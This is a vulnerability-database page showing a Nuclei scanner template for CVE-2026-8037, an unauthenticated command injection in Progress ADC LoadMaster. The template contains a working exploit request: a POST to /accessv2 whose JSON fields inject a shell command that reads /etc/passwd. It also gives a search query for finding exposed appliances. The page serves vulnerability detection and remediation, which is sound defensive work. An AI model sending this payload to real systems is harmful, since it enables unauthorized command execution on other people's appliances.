Lucene search
K

Progress ADC LoadMaster - Command Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

OS Command Injection Remote Code Execution Vulnerability in API in Progress ADC Products allows an un-authenticated attacker to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in multiple command endpoints

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-8037
4 Jun 202613:13
attackerkb
ATTACKERKB
CVE-2026-33691
2 Apr 202615:03
attackerkb
Tenable Nessus
Amazon Linux 2023 : mod_security_crs (ALAS2023-2026-1562)
13 Apr 202600:00
nessus
Tenable Nessus
Linux Distros Unpatched Vulnerability : CVE-2026-33691
21 Apr 202600:00
nessus
Amazon
Medium: mod_security_crs
13 Apr 202600:00
amazon
GithubExploit
Exploit for CVE-2026-8037
30 Jun 202607:57
githubexploit
Circl
CVE-2026-33691
29 Mar 202617:26
circl
Circl
CVE-2026-8037
5 Jun 202610:19
circl
CNNVD
OWASP CRS 安全漏洞
2 Apr 202600:00
cnnvd
CNNVD
Progress Software多款产品 命令注入漏洞
4 Jun 202600:00
cnnvd
Rows per page
id: CVE-2026-8037

info:
  name: Progress ADC LoadMaster - Command Injection
  author: watchtowr,DhiyaneshDk
  severity: critical
  description: |
    OS Command Injection Remote Code Execution Vulnerability in API in Progress ADC Products allows an un-authenticated attacker to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in multiple command endpoints
  impact: |
    Unauthenticated attackers can execute arbitrary commands on the LoadMaster appliance, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of Progress ADC LoadMaster.
  reference:
    - https://community.progress.com/s/article/LoadMaster-Critical-Security-Bulletin-June-2026-CVE-2026-8037-CVE-2026-33691
    - https://labs.watchtowr.com/enterprise-tech-in-shell-out-progress-kemp-loadmaster-uninitialized-heap-to-pre-auth-rce-cve-2026-8037/
  metadata:
    verified: false
    fofa-query: body="Progress" && icon_hash=="-2107233094"
    max-request: 1
  tags: cve,cve2026,progress,loadmaster,rce,vkev

http:
  - raw:
      - |
        POST /accessv2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: */*

        {"cmd": "getall", "apiuser": "''''", "apipass": "BBBBB", "g0": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g1": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g2": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g3": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g4": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g5": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g6": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g7": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g8": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g9": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g10": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g11": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g12": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g13": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g14": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g15": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g16": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g17": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g18": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g19": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g20": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g21": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g22": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g23": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g24": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g25": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g26": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g27": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g28": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g29": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g30": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g31": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g32": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g33": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g34": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g35": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g36": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g37": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g38": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g39": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g40": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g41": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g42": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g43": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g44": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g45": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g46": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g47": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g48": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g49": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g50": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g51": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g52": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g53": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g54": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g55": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g56": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g57": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g58": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g59": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g60": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #"}

    matchers-condition: and
    matchers:
      - type: word
        part: response
        words:
          - "root:x:0:0:"

      - type: word
        part: content_type
        words:
          - "text/json"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210099944ccb160b5a7f204791a02a4452161515a71fcd914232105cfcd1ad52f964022100ccd1dc9e3451b196e74c8993714e0db763324aa6e623f71f6fc6fa3d6cb08ca7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jun 2026 20:13Current
7.9High risk
Vulners AI Score7.9
CVSS 3.17.5 - 9.6
EPSS0.0819
SSVC
3